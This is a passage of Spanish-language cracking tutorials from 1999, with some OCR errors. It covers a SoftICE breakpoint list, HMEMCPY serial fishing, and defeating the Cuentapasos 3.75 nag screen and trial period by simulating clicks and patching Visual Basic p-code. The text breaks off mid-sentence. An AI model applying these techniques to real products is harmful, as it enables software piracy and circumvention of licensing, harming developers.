BPINT 13 if ah==2 (DOS) 
BPINT 13 if ah==3 (DOS) 
BPINT 13 if ah==4 (DOS) 


BPX GetFileAttributesA 

BPX GetFileSize 

BPX GetDriveType 

BPX GetLastError 

BPX ReadFile 

BPIO -h (Your CD-ROM Port Address) R 


7)Dongle Cracking 
BPIO -h 278 R 
BPIO -h 378 R 


BPINT 21 if ah==3dh (DOS) 
BPINT 31 if ah==3fh (DOS) 


BPINT 21 if ah==3dh (DOS) 
BPX ReadFileA 
BPX CreaterFileA 


9)Keyboard Input Related 


BPINT 16 if ah==0 (DOS) 
BPINT 21 if ah==0xA (DOS) 


Nota: Texto original en inglés de Aesculapius 
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1- ¿Que es HIMEMCPY? 


HMEMCPY es una API de Windows, que utiliza la memoria RAM para leer, manipular, comparar y 
almacenar cadenas (texto que introducimos cuando un programa nos pide el numero de serie por 
ejemplo). La funcion recoge la informacion que le proporcionamos y la carga en memoria. Despues 
manipula esas cadenas, las mueve y las compara (por ejemplo compara tu numero de serie con el 
correcto), y despues decide si la cadena es o no la correcta. 

La funcion HMEMCPY devuelve esta informacion al programa en cuestion, y si has puesto el serial 
correcto te lo aceptara o de lo contrario te mostrara una bonita ventana de error. 


2- ¿Para que nos sirve a los Crackers HIMEMCPY? 


HMEMCPY se puede utilizar para "cazar" numeros de serie validos en programas shareware. 
Utilizando un debugger (depurador) como el Softlce, podemos poner un breakpoint en HMEMCPY 
para que el programa se pare y nos avise cuando llama a la funcion. Muchos programas shareware 
utilizan HMEMCPY para comparar numeros de serie, sobre todo cuando han sido escritos en Delphi o 
en Visual Basic. 


3- ¿Como preparar el Softlce para pararnos en HMEMCPY? 


Cargamos nuestra "victima" y vamos a la ventana de registro, donde normalmente se nos pedira un 
nombre y un numero de serie. Suele haber un boton que se debe pulsar para validar los datos una vez 
introducidos. Pues bien, si existe el boton procedemos de la siguiente forma: 


Rellenamos los datos, nombre y serial cualquiera. Vamos al Softlce y ponemos un breakpoint en 
HMEMCPY, para lo cual escribimos " BPX HMEMCPY ". Lo que estamos haciendo es indicarle al 
Softlce que se pare y nos avise cuando nuestra "victima" llame a HAMEMCPY. 


Una vez puesto el breakpoint, pulsamos Ctrl+d para volver al programa. Pulsamos el boton de registro 
y volveremos al Softlce. Bien, ahora si suponemos que los datos que nos pedian solo eran dos, el 
nombre y el numero de serie..... necesitamos pulsar una vez Ctrl+D (o F11, es lo mismo) puesto que si 
no lo hacemos estaremos siguiendole la pista al nombre y no es lo que nos interesa. :0) 


Si no existe el boton de registro: 
Ponemos el BPX antes de introducir el ULTIMO caracter de nuestro serial falso. 


Ahora si que estamos en el camino correcto (bueno, casi). Si te fijas, en el Softlce veras una linea 
encima de la ventana de comandos que pone el nombre del programa en el que estas. En nuestro caso 
lo usual sera que veas algo como: "USER(0A)" o "(USER(01)" pues esta parte no nos interesa para 
nada, tenemos que llegar al codigo de nuestra "victima". Para lo cual pulsamos F12 unas cuantas veces 
hasta que veamos el nombre de nuestro programa en cuestion, lo cual nos indicara que estamos dentro. 
Si por ejemplo el programa se llama "victima" veremos algo como "VICTIMA!CODE". 


4- ¿Que podemos buscar? 


Una vez que estamos dentro del codigo de nuestra "victima", tenemos que buscar una comparacion 
(CMP, TEST) y/o un salto condicional (JE, JNE, JZ, JNZ...etc). Si encuentras una comparacion y 
despues un salto, lo mas probable es que sea una zona muy muy interesante. 


Un ejemplo: 

CALL XXXXXXXX 

MOV EAX, [EBP-14] ¡EAX contiene el serial que introducimos 
MOV EDX, [00463A56] ¡EDX contiene el serial CORRECTO 

CALL XXXXXXXX ¿Llamada a una rutina para compararlos 
JNZ 0047FCA4 ¿Si es correcto salta a REGISTRADO (si no es cero) 
MOV EAX,00466F34 ¿Si es cero no estamos registrados 

CALL XXXXXXXXX 

JMP 0047FCCC 

MOV EAX, 004738D4 

MOV EDX,00466F7C 

CALL XXXXXXXX 


Esta rutina es bastante tipica, aunque obviamente hay muchas variantes. :0) 

Para "cazar" nuestro serial en este ejemplo, necesitamos situarnos sobre la linea "MOV EDX,[00463A56]" , ahora 
vamos a ver que diablos contiene el registro EDX para lo cual escribimos en el Softlce "D EDX". NUESTRO SERIAL 
CORRECTO !!! 


Otra rutina bastante comun seria algo similar a esto: 


PUSH EAX 

CALL XXXXXXXX ¡Llamada a una funcion que calcula nuestro serial Correcto 
ADD ESP, 04 ¿y lo almacena en memoria 

TEST EAX, EAX ¿Compara nuestro serial con el Correcto 

JNZ 00440994 ¡Si no es cero salta a REGISTRADO 


PUSH 
PUSH 
PUSH 
CALL 


0047B52B ¡Nuestro serial Correcto 
64 

EBX 

XXXXXXXX 


Los registros y las posiciones de memoria que tu te vas a encontrar seran diferentes , pero la rutina sera bastante 
parecida. Para ver nuestro numero de serie valido nos situamos en la linea del PUSH 0047B52B y escribimos en el 
Softlce "d 0047B52B" 

Para terminar nada mejor que practicar con la obra maestra de algun programador desinformado. (Se nota que pocos 
programadores leen nuestros tutoriales jejeje, en fin, peor para ellos, el que no aprende es porque no quiere). 


Como obtener un Serial Valido para Talisman v1.1 


====== kk PERSONAL GREETZ 4 *-========¿4% 


Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 

JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 


* * 


|WHISKEY KON TEKILA| 
|Mr.WhiTe [WkT!99] | 
|http://wkt.tsx.org| 
|[http://ecd.tsx.org| 


* * 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


Whiskey Kon Tekila 


Programa Cuentapasos 3.75 W95 / W98 / NT 


Descripción Control del gasto telefónico 
Po Tipo Shareware 
Url http://www .cuentapasos.com 
[Protección Nag Screen. Periodo evaluación de 30 dias 
[Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas [Softice v4.0, SmartCheck 6.0, Spy++ 
| Objetivo Simular estar registrados. 


Cracker Mr. Blue 
Fecha 18 de Octubre de 1999 


Introducción 


Quién no haya intentado crackear este clásico, o alguna de sus versiones predecesoras, que me 
tire la primera piedra... 


Todos hemos oído hablar del Cuentapasos que, a pesar de existir otros programas equivalentes 
de distribución gratuita, sigue siendo una codiciada presa. Nos encontramos ante una 
aplicación escrita en Visual Basic, en la que el autor ha intentado protegerla por todos lados, 
tapando entradas y huecos, cerrándonos puertas de formas más o menos inteligentes. Y 
sabemos que cuanto más interés pone el autor en proteger una aplicación, más interesante hace 
a la presa, desde el punto de vista didáctico que es el que nos mueve a los miembros de WKT!. 


Sirva el presente tutorial para demostrar la gran dificultad que supone para cualquier 
programador realizar una protección eficiente de sus aplicaciones cuando estas están escritas en 
Visual Basic. La nueva forma de compilación en p-code no hace más que facilitar las cosas a 
los amantes de la ingeniería inversa. De hecho, durante el tutorial se mostrará que desproteger 
un programa de Visual Basic p-compilado es mucho más sencillo e inmediato que el mismo 
compilado en código nativo. 


Aprenderemos, además de cómo pelearnos con éxito contra el p-code, otras técnicas exóticas. 
Reconozco que podría haberse hecho de otra forma menos elaborada, pero nuestra meta no es 
crackear; es aprender, enseñar y mostrar nuevas técnicas crackeando. 


Reconocimiento y exploración 


Veamos a que nos enfrentamos. Al ejecutar el programa, nos aparece una pantalla de 
bienvenida, en la que posteriormente aparece que es una versión de evaluación. Sobre esta 
pantalla aparece otra que nos muestra los datos de la aplicación, dirección de correo electrónico 
del autor, etc... También aparece un código de compra, tanto en el título como en el botón de la 
derecha. 


Lo que nos interesa es que aparecen los días transcurridos del periodo de evaluación y los días 
que nos restan que no es más que treinta menos los días transcurridos. Además aparecen dos 
botones, Aceptar y Salir. Estos serán nuestros enemigos, la nag-screen y las rutinas que 
calculan los días restantes de evaluación. Nuestros objetivos serán que el usuario no se vea 
obligado a pulsar Aceptar para arrancar la aplicación (es irritante) y por supuesto, "ampliar" el 
periodo de evaluación (que alguien puede pensar que es insuficiente). 


Es una buena costumbre, para empezar a tomar contacto con el programa, y sobre todo en esta 
fase inicial en la que tenemos que planear nuestra estrategia, pasar a la víctima por un detector 
de formatos como el GetTyp. La salida del GetTyp nos muestra que el ejecutable se encuentra 
comprimido. Más explicaciones en el tutorial de Mr.Orange sobre descompresión manual con 
ProcDump. Al encontrarse comprimido, no podremos realizar un parcheador que actúe sobre el 
fichero en disco, tendremos que descomprimirlo previamente. 


El ratón virtual 


Para saltar la nagscreen vamos a utilizar un método clásico, que muchos pueden desconocer. 
Vamos a simular un click del ratón sobre el botón Aceptar, sin intervención del usuario. Es un 
método en desuso pero elegante y limpio, que nos permite comprender un poco mejor el 
funcionamiento del Windows y aprender muchas cosas, que es para lo que estamos aquí. 


¿Cómo se hace? Lo primero que debemos hacer es obtener el identificador del proceso del cual 
queremos depende el botón que queremos pulsar. Esto puede hacerse de dos maneras, o 
ejecutamos nosotros el proceso vícitma mediante CreateProcess o nos enganchamos al proceso 
que ya está en ejecución. Lógicamente, lo que a nosotros nos interesa es lo primero, para lo que 
crearemos un cargador del programa que será el que cargue a la aplicación víctima, esperará a 
que se cargue y buscará una referencia o handle de la ventana en la que se encuentra el botón 
que queremos pulsar. Después, buscaremos en esa ventana el botón que nos interesa y 
finalmente simularemos un click sobre él. 


Para buscar la ventana se utiliza la función EnumThreadWindows. Esta función sirve para 
enumerar todas las ventanas padre asociadas al thread que le pasamos como parámetro. Para 
ello, utiliza una función de tipo Callback que no es más que una función escrita por nosotros, 
que es ejecutada por EnumThreadWindows cada vez que encuentra una ventana. 
EnumThreadWindows le pasa a nuestra función de Callback el puntero a la ventana que ha 
encontrado.Nuestra función , a su salida, devolverá un booleano: False si ya se ha encontrado la 
ventana o True en caso contrario. EnumThreadWindows no devolverá el control a nuestro 


cargador hasta que la función de Callback haya devuelto un False o bien se hayan enumerado 
ya todas las ventanas. 


¿Y cómo sabemos si una ventana es la que buscamos o no? Para eso, nuestra función de 
Callback puede utilizar varias funciones: 


e GetClassName. Devuleve el nombre de la clase de la ventana que le pasamos como 
parámetro. 

e GetWindowText. Devuelve el texto o título de la ventana. 

e GetWindowRect. Devuelve las coordenadas de la esquina superior izquierda y esquina 
inferior derecha de la ventana. 


Una vez que hayamos encontrado la ventana que contiene el botón que queremos pulsar, 
debemos encontrar un puntero a este botón. En este caso, la función es EnumChildWindows, a la 
que le pasamos el puntero a una ventana padre, y nos enumera todas la ventanas hijas de ella 
(botones, cuadros de texto,...). Su funcionamiento es idéntico al de EnumThread Windows. 


Ya tenemos el botón, ahora, a pulsarlo. Esto se realiza mediante PostMessage, que manda a la 
ventana que queramos, el mensaje que queramos. En este caso, enviaremos a un botón el 
mensaje BM_CLICK, que simula pulsar y soltar el botón del ratón. 


Más información y ejemplos sobre este tema en las páginas de Fravia, en la sección '+HCU's 
Papers": Simulating User Input to Eliminate Nag Screens por bb. 


¡ Atrapen a ese botón ! ¡ Atrapenlo ! 


Botones al borde de un ataque de nervios 


Antes de nada tenemos que recabar información sobre el botón que queremos "pulsar". 
Volvemos a arrancar el Cuentapasos pero dejamos sin pulsar el botón Aceptar. Arrancamos el 
Spy++ (o similar) para que nos muestre los parámetros de los componentes de la nagscreen, en 
especial los nombres de clase de los objetos de interes, el texto que aparece y las coordenadas. 
Pulsamos en la opción 'Find' (Alt+FF3) y pasamos el punto de mira por todos los componentes de 
Interés. 


Por si no os habeis dado cuenta todavía, de ejecución en ejecución, los botones Aceptar y Salir 
se intercambian de manera aleatoria. Así, el autor evita una de las posibles formas de 
distinguirlos, mediante su situación en pantalla que nos da la función GetWindowkRect. 


Tanto la nagscreen como la ventana de presentación son de la clase ThunderRT5Form, para 
poderlas distinguir nos tendremos que fijar en el título, ya que la pantalla de presentación no 
tiene título y la nagscreen tiene '"Versión de Evaluación P...'. Por lo que parece, no vamos a 
tener problemas para encontrar la ventana padre de nuestro botón. 


Vamos a los botones. Podemos olvidarnos del botón ''Comprar «Programa P...”, ya que es 
facilmente identificable por tamaño, situación y texto. Tanto el botón Aceptar como Salir, 
tienen exactamente el mismo tamaño, evitando así el autor del programa que podamos 
distinguirlos mediante la función GetWindowRect que también permite conocer el tamaño de 
una ventana. Los dos son de la clase ThunderRT5CommandButton (tampoco podremos 
distinguirlos por el nombre de la clase), y el texto... oh, oh. Ninguno de los dos tienen texto, así 
que tampoco nos sirve GetWindowText. Y algunos se preguntarán, "Entonces ¿Aceptar y Salir 
qué son?" Pues está claro, si no son cadenas de texto serán ... imágenes. Para probarlo, cambiad 
el color de las ventanas de Windows y veréis que, aunque el botón cambia de color, las palabras 
Aceptar y Salir están enmarcadas por el fondo gris que trae por defecto el Windows. Como 
podeis ver, el autor ha obrado inteligentemente y se ha informado convenientemente sobre 
técnicas de ingeniería inversa (a lo mejor hasta nos lee a nosotros). 


Bien, no nos pongamos nerviosos. Tenemos dos botones que al parecer, cambian de sitio de 
manera aleatoria pero ... el orden de creación de los botones siempre será el mismo, 
independientemente de donde se situen. Si excarvamos más profundamente en la ayuda de la 
APT nos encontramos la función GetNextWindow, que dado el puntero a una ventana hija, nos 
da el puntero a la ventana hija siguiente o a la posterior. Ya tan solo queda por descubrir que 
posición ocupa el botón Aceptar en el orden de creación. De hecho, la función 
EnumChildWindows enumera las ventanas hijas en el orden de creación, bastaría con coger, por 
ejemplo, la cuarta ventana que nos enumere suponiendo que el botón Aceptar sea la cuarta. 


Bueno, vamos a ver. Volvemos al Spy++ con esperanzas renovadas y pulsamos las propiedades 
del botón Aceptar de la nagscreen. En mi caso es el botón de la izquierda y es el último que 
aparece en la lista, si pinchamos en la etiqueta '"Windows' de la ventana de propiedades del 
botón podemos recorrenos sus predecesores, y al ser el último, no tiene sucesores. Veamos si 
esto es cierto cuando Aceptar cambia de sitio. Cerramos el Cuentapasos y lo ejecutamos hasta 
que el botón Aceptar sea el del centro. Volvemos a ir al Spy++ y el botón Aceptar..... joderl, 


¿mM 


ahora es el penúltimo. Será "joío". Parece que el autor se ha informado "demasiado bien”. 


Esto significa, que los botones no cambian de sitio, lo que cambia es la funcionalidad de cada 
uno de ellos, y la imagen que tienen incrustrada. No podemos distinguirlos por la posición, ni 
por el tamaño, ni por el texto, ni por la clase, .... 


Soluciones 


e Registrarnos. :-( 

e Aplicar la solución propuesta por bb en Simulating User Input to Eliminate Nag 
Screens. 

e "Amarrar" a ese travieso botoncito en un sitio fijo. 


La solución propuesta por bb, para el WinZip (un problema idéntico al nuestro) es utilizar la 
función GetPixel para poder distinguir qué imagen tiene cada botón. Para unas coordenadas 
dadas, esta función devuelve el color del pixel correspondiente. Conocemos las coordenadas de 
los dos botones, tan solo nos queda buscar un pixel en de los botones Aceptar y Salir que sean 
disitntos. Esto, con cualquier programa gráfico esta "chupao". Sería la solución ideal, ya que 
siempre debemos intentar modificar los menos posible el ejecutable de nuestra víctima. 


Como somos más chulos que un ocho, y lo que queremos es mostrar la facilidades que nos 
ofrece Visual Basic, vamos a "pegar" el botón Aceptar a un sitio fijo, para posteriormente, 
ametrallarlo a placer con PostMessage. Para hacer esto, tendremos que bucear en el código con 
ayuda del Softlce y del SmartCheck, y, lógicamente, cambiar algunas "cosillas" en las rutinas 


que deciden dónde se pone cada botón. Descubriremos la impactante sensación de "no me 
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entero de ná" que se experimenta inicialmente al sumergirnos en el p-code. Agarraros al ratón 
que el viaje va a ser movidito. 


P-Code: Descenso a los infiernos de Micro$oft 


Número aleatorios 


Antes de entrar en faena, es casi obligado leerse el fantástico tutorial de Esiel2, CRACKEANDO EN VISUAL BASIC. 


Aprenderéis todo lo básico para para crackear programas de Visual Basic, y cómo configurar nuestras herramientas 
adecuadamente para sacarles el máximo partido al atacar programas escritos en este lenguaje. 


Tal y como hacemos siempre que tenemos una pieza realizada en Visual Basic, recurrimos al alucinante SmartCheck. 
Arrancamos el SmartCheck, cargamos el programa y, lo primero que nos aparece, a modo de advertencia es lo siguiente: 


cpasos32.exe 1s compiled to p-code...etc... 


Se podría decir que los amigos de NuMega nos quieren advertir que bajo esas condiciones, nuestra ya esacasa salud mental 
puede correr peligro. Tenemos la oportunidad de arrepentirnos, como en toda aplicación de Windows que se precie, pero 
"semos” valientes y elegimos continuar. 


Inicialmente no vamos a necesitar las llamadas a la APL por lo que podemos habilitar la opción de suprimir las llamadas a la 
API. Ejecutamos el Cuentapasos desde el SmartCheck, habilitando desde el principio la captura de eventos, y nos acomodamos 
en la silla, para ver pasar la película. Cuando aparezca la nagscreen, nos fijamos que posición ocupa el botón Aceptar y 
pulsamos Salir . Como vamos a intentar localizar donde pueden estar las rutinas que deciden donde se situa cada botón con 
llegar a la nagscreen tenemos de sobra. 


Nos vamos a la zona en la que se carga la nagscreen, al final. Buscamos el evento frmRegistro_Load: 


15240 Ehe lbláceptoCondiciones. Caption <-- "Entiendo que puedo utilizar CuentaPasos para uso exclusivo de e" [String]l 

15241 Eh lbláceptoCondiciones.FontBold <-- False [Boolean] 

15242 he emdComoRegistrarse. Caption <-- "Comprar Programa P501092-1032-49" (String) 
23% And returns double:0,9741839 [displayed as sinale-precision floating point) 

15244 Ea imgácepto.Picture 

15245 Ene cmdáceptar(0]. Picture <-- ptr:DO52E634 (WT_PTR] 

15246 Ehe emdáceptar(0)MWéhatsThisHelplD <-- 26025 (Long) 

15247 Ea imgSalir. Picture 

15248 he emdáceptar(1). Picture <-- ptr.D0052E590 (WT_PTR] 

15249 he cmdáceptar(1] Cancel <-- True [Boolean] 

15250 Ehe cmdáceptar(1]WhatsThisHelplD <-- 26030 (Long) 


15251 ¿£ fimRegistro_Load 
15252 “>  fimRegistro.Show 
15295 9% Now 

15296 $% Month 

15297 -S  fimSplash.Hide 


Como puede verse, lo último que hace la aplicación al cargar la nagscreen es inicializar las propiedades de los botones. En esta 
ocasión, el botón Aceptar me ha salido a la izquierda, por lo que tus resultados serán distintos si te ha salido en el centro. Así, en 
el evento 15242, se asigna la propiedad Caption del botón que muestra la ayuda de como registrarse. A partir del evento 15244, 
se asignan las propiedades a otros dos botones que no pueden ser otros que lo que a nosotros nos traen de cabeza. Se cargan las 
imágenes 'imgAcepto' y 'imgSalir', y se asignan a la propiedad Picture de cada uno de los botones. Al botón 'emdAceptar(1)' se 
le activa la propiedad Cancel. Si desempolvamos la ayuda de Visual Basic, encontramos que si esta propiedad es TRUE, la tecla 
ESC activará al botón. Si volvemos a cargar el Cuentapasos (sin el SmartCheck) y pulsamos ESC en la nagscreen, la aplicación 
termina. Esto significa que en este caso el botón 'cmdAceptar(1)' está funcionando como Salir. Conclusión, 'emdAceptar(0)' es el 
botón de la izquierda y el otro el del centro. Esto podemos probarlo ejecutando varias veces el Cuentapasos, y viendo como al 
cambiar Aceptar al centro, la propiedad Cancel se la activa a 'emdAceptar(0). 


Veis lo que hay en el evento 15243. Justo después de inicializar el botón de Comprar y justo antes de los de Aceptar y Salir, se 
genera un número aleatorio mediante la función Rnd(). Por su delatadora situación, creo que todos apostaríamos el brazo a que 
la decisión de dónde se colocan los botones, tiene mucho que ver con el numerito obtenido. Si nos las amañamos para que dicho 
numerito tenga siempre un valor fijo, el botón Aceptar se quedará fijo. 


Vemos desde donde se invoca la función Rnd(), ¿desde "MSVBVMS50.DLL!000FE7BD"? Arrea, ¿qué es esto?. Comenzamos a 
mirar el resto de funciones y TODAS se ejecutan desde las direcciones OFE7BD y OFE7ED de MSVBVMS5O0.DLL, exceptuando 
aquellas que tengan que ver con objetos visuales (forms, botones,...) 


¿Se nos vuelve loco el SmartCheck con programas p-compilados? 


La puerta del sótano 


Vamos a ver si el Softlce nos aclara algo. Lo primero que debemos hacer, como con todos los programas de Visual Basic, es 
cargar los símbolos de las librerías de VB. En este caso, como nos lo ha "chivado" el SmartCheck, es la librería 
MSVBVMS50.DLL. Lo de "MSVBVM" debe ser algo así como MicroSoft Visual Basic Virtual Machine, o máquina virtual de 
Visual Basic (toda una máquina de torturas, ya vereis...) 


Consultamos cuál de las funciones que exporta, puede ser Rnd(). Tenéis un listado de todas las funciones que se exportan en el 
tutorial de Mr.Brown para VB5. Nos saltan a los ojos dos de ellas: 


Addr:0F004A95 Ord: 593 (0251h) Name: rtcRandomNext 
Addr :0F0O3AE08 Ord: 594 (0252h) Name: rtcRandomize 


Visual Basic dispone de dos funciones para generar números aleatorios: 


e Randomize. Se utiliza para inicializar el generador de números aletorios. El Cuentapasos la utiliza, por ejemplo, al 
inicio del frmRegistro_Load. 
e Rnd(). Devuelve un número aleatorio entre O y 1. 


La función Rnd() se corresponderá con la rtcRandomNext exportada por la DII. Lo primero que debemos ver es el número de 
veces que el Cuentapasos llama a la función Rnd() antes de la llamada que nos interesa. Nos colocamos en el SmartCheck y 
buscamos las llamadas a Rnd(). Se producen dos llamadas, la nuestra es la segunda. 


Bajada a los infiernos 


Nos vamos al Softlce, y colocamos un bpx rtcRandomNext. Volvemos al Windows y ejecutamos el Cuentapasos. Vemos como 
se carga el splash y ... BOOM... salta el Softlce. Como la que nos interesa es la segunda llamada, pulsamos Ctrl+D y enseguida 
vuelve a saltar el punto de ruptura. No nos importa que es lo que hace la función rtcRandomNext para generar el número 
aleatorio, solo nos interesa saber que es lo que el Cuentapasos se propone hacer con él. Pulsamos F11 y salimos justo destrás del 
call que llamó a la función, en la dirección OFOFE7COH de la DII del VB. 


La función Rnd() devuelve un número entre cero y uno, por lo que debe devolverlo en los registros de punto flotante. Para ver el 
contenido de esos registros desde Softlce escribimos wf. Efectivamente, el número aleatorio generado se encuentra en el registro 
STO. 


Empezamos a ejecutar paso a paso pulsando F8, y en seguida encontramos algo interesante: 


OFOFE7CC mov al, [esi] 
OFOFE7CE inc esi 
OFOFE7CF jmp ds: [eax*4+0FO0FED94] 


Cargamos en AL el contenido de la dirección apuntada por ESI (0F4h), incrementamos ESI y saltamos a una dirección que 
depende de lo que hemos leído con ESI. Si vemos a dónde esta apuntado ESL, descubriremos que está apuntando al código de 
nuestro querido Cuentapasos. 


Tras el salto, aterrizamos en OFOFDE15. Seguimos pulsando F8 y vemos como se carga en la pila un byte de valor OAh que está 
en el código del Cuentapasos (siempre apuntado por ESI). Nuevamente, uno de los bytes del código del ejecutable (OEBh) es 
utilizado para efectuar un salto exactamente igual que antes, al contenido de la dirección OEBh*4+0F0FED94=0FOFF140 


Esta vez vamos a parar a OFOFD3ES, en donde el OAh cargado anteriormente en la pila es volcado en el registro STO, 
desplazando el número aleatorio al ST1. Se elimina el OAh de la pila y se vuelve a realizar otro salto igual que el anterior. 


Caemos en OFOFDFCB. Vamos a parar un momento a ver si nos aclaramos la cabeza antes de que cometamos una locura con el 
monitor y la silla ... 


Una luz al final del pasillo... 


Nos desplazamos por la ventana de código y le echamos una mirada a los alrededores de donde estamos situados. Nos 
encontramos porciones de código de 5-10 instrucciones, todas terminadas por el mismo código que cité antes; carga de un byte 
apuntado por ESI en AL, incremento ESI y salto al contenido de la dirección calculada como EAX*44+0FOFED94h. 


Vamos a echarle un vistazo a esa especie de tabla de direcciones que parecen usar todas las porciones de código al terminar para 
proseguir con la ejecución. Miremos, por ejemplo, en la dirección OFOFF140h, que se cálculo al final de la parte de código que 
cargo el OAh del código del Cuentapasos en la pila. Encontramos en dicha dirección, OFOFDSES5h, que es la dirección de la 
porción de código en la que se carga el contenido de la pila en STO. Las direcciones que se encuentran alrededor, apuntan 
igualmente a porciones de código que al finalizar, vuelven a recurrir a esta tabla para ver a donde saltan. 


Del infierno al cielo 


Dicho en otras palabras, el ejecutable (cpasos32.exe) nunca es ejecutado. Su código es leído e interpretado completamente por la 
DIl. Por lo tanto, todas y cada una de las instrucciones en ensamblador que conocemos, tendrán que tener una porción de 
código en la DI] que las sustituya. 


Volvamos al inicio, a la dirección OFOFE7CCH, justo después de volver de la función Rnd(). Allí, cargamos del ejecutable un 
byte, OF4h, que nos hizo saltar a una dirección en la que se cargo el siguiente byte del ejecutable, OAh, en la pila. Por tanto, 
nuestro "push OAh" del ensamblador que en código máquina se codifica como "6A OA”, en p-code es "F4 OA". El F4h será 
interpretado como "introducir el siguiente byte en la pila" por la tabla situada en OFOFED9Ah, al ejecutarse con la DII. 


No es más que la filosofía de Visual Basic, en la que las funciones más generales no se implementan en los ejecutables, si no en 
unas librerías comunes a todas las aplicaciones de VB, pero llevada a sus últimas consecuencias. No solo se implementan en las 
librerías las funciones más usuales si no que además se meten TODAS las instrucciones que puede ejecutar la aplicación. 


Algunos pensarán, "Pues bien, es tan solo una especie de traducción rara que lo que hace es complicar las cosas. Es un lenguaje 
completamente interpretado. ¿Dónde está esa ventaja del p-code?". Si alguien no lo ve claro ahora, cuando ataquemos a las 
rutinas de cálculo del periodo restante de evaluación, se le abrirán los ojos. 


Clavando un botón 


Recordamos por donde íbamos. Se había generado un número aleatorio entre O y 1 que almacenamos en el registro STO. 
Posteriormente, cargamos un OAh del código del Cuentapasos en el registro STO, desplazando el número aleatorio a STI. 


Nos situamos en OFOFDFCB, en donde multiplicamos el contenido de los registros STO y ST1 almacenando el resultado en STO. 
Nuevo acceso a la tabla de interpretación y aparecemos en OFOFDSBS, en donde el contenido del registro STO es redondeado al 
entero más cercano y volcado a la pila. Se almacenan los flags FPU (que son como los flags de toda la vida pero exclusivos de 
los registros de coma flotante) en el registro EAX. 


Una nueva visita a la tabla y saltamos a OFOFDE28h para cargar un valor de 4 bytes del ejecutable (2) en la pila. En este caso es 
un "push" de una doble palabra, no de un byte. Otro paseo por la tabla y caemos en OFOFE013. Recuperamos de la pila el 2 
anterior en ECX, y lo que volcamos anteriormente del registro STO en EAX. Dividimos este último por el 2, almacenándose el 
cociente en EAX y el resto en EDX. Se vuelca el resto a la pila y nos disponemos a saltar a otro sitio. 


Del número aleatorio generado, tan solo nos queda el valor volcado a la pila. Al haberse dividido por dos, este valor será0 o 1. 
La aplicación decidirá las posiciones de los botones según este valor. Nos hemos quedado con el resto de la división: 


round(x*10) / 2 
donde 'x' es el número aleatorio generado, entre cero y uno. 


Pulsamos Ctrl+D para ejecutar completamente el Cuentapasos. Los que tuvierais como resto de la división un cero, ¿a qué tenéis 
el botón Aceptar a la izquierda? ¿A que los que lo tenéis en centro, el resto os daba uno? 


Podemos probar nuestra teoría tanto con el SmartCheck como con el Softlce (más rápido). Ejecutamos varias veces el 
Cuentapasos, capturando el valor aleatorio devuelto. Calculamos metalmente cual sería el resto y vemos si se corresponde con la 
ubicación del botón Aceptar. 


Todavía podemos ir más lejos. ¿Cómo influye el resto de la división en la elección de qué hace un botón y qué hace el otro? Si 
recordamos lo que vimos con el SmartCheck, 'cmdAceptar' es un array de dos botones. 'cmdAceptar(0) es el botón de la 
izquierda y 'cmdAceptar(1) el del centro. Lo que la aplicación parece hacer, es asignar la función de Aceptar a 


'emdAceptar(resto)' y Salir a 'cmdAceptar(resto xor 1). 


Vamos a inmovilizar el puto botoncito de los.... . Tenemos que obligar a que el resto de la división tome siempre el mismo valor, 
cero o uno, independientemente del número aleatorio generado. Se nos pueden ocurrir dos formas: 


e Cambiar las instrucciones. Después del ejercicio que acabamos de hacer, conocemos los códigos que corresponden a 
varias instrucciones (push, división, multiplicación,..).Así, por ejemplo, podríamos sustituir las instrucciones que 
multiplican, redondean y almacenan en pila el aleatorio generado por un "push 00000002" o un "push 00000001", que 
ya sabemos como se codifican en p-code. Así, en lugar de meter en la pila el aleatorio multiplicado por 10 y 
redondeado, meteríamos un entero fijo. Debemos tener la precaución de que el número de bytes de la instrucción falsa, 
sobreescriba completamente las instrucciones a las que sustituye, por que todavía no conocemos como es el "nop" ;-) 

e Cambiar los operandos. Está es la solución más fácil y segura. 


¿Qué operandos podemos cambiar? Pues tenemos el OAh (de la multiplicación) y el 0000002 (de la división). ¿Formas de 
obligar a que el resto de la división tome un valor fijo? Por lo menos dos: 


e Multiplicar el aleatorio por cero en lugar de diez. Resto de la división cero, Aceptar siempre a la izquierda. 
e Dividir por uno en lugar de dos. Resto de la división cero, Aceptar siempre a la izquierda. 


Si hemos descomprimido el ejecutable, podemos ir realizando los parches sobre disco para ir comprobando que efectivamente 
funcionan. Repetimos los pasos anteriores para ir anotando las direcciones en memoria en las que se encuentra el operando que 
deseamos cambiar, las cadenas que deberemos buscar para localizar estos operandos en el ejecutable descomprimido con un 
editor hexadecimal, etc.. Ya sabeis como se hace esto, ¿verdad? 


Reventamos el P-Code 


Ahora, nos olvidamos del Cuentapasos, del SoftlIce, de la vecinita esa que está tan buena.... y 
nos concentramos en lo que hemos descubierto sobre el p-code. 


Para enfrentarse contra programas en Visual Basic normales, muchos habréis leído tutoriales 
información sobre funciones clave de Visual Basic que en un momento dado nos pueden ser 
muy útiles. En casi todos, se recomienda la función __vbastrcomp, utilizada por Visual Basic 
para comparar cadenas de texto. Así, en programas en donde debes introducir una clave de 
registro alfanumérica, la aplicación, en algún sitio, deberá comparar la cadena introducida con 
la que la aplicación considera correcta. 


En programas escritos en otros lenguajes no interpretados, la rutina de comparación de las 
cadenas se incluye en el ejecutable. Sabemos que está ahí, pero no sabemos dónde. En Visual 
Basic, esa función es una de las que no se incluyen en el ejecutable, si no que se encuentra en 
las librerías compartidas con el resto de aplicaciones de VB. En el caso de __ vbastrcomp, nos 
basta con colocar un punto de ruptura en esta función. Como puede ser llamada muchas veces, 
podemos limitar el punto de ruptura a que la cadena a comparar sea la que introducimos. 


La facilidad de desproteger los programas en Visual Basic, radica en esta compartición de 
funciones, que nos permite conocer, para algunas tareas específicas, donde colocar nuestro 
punto de ruptura. 


En el caso del p-code, siguen utilizándose estas rutinas compartidas, pero la novedad es que 


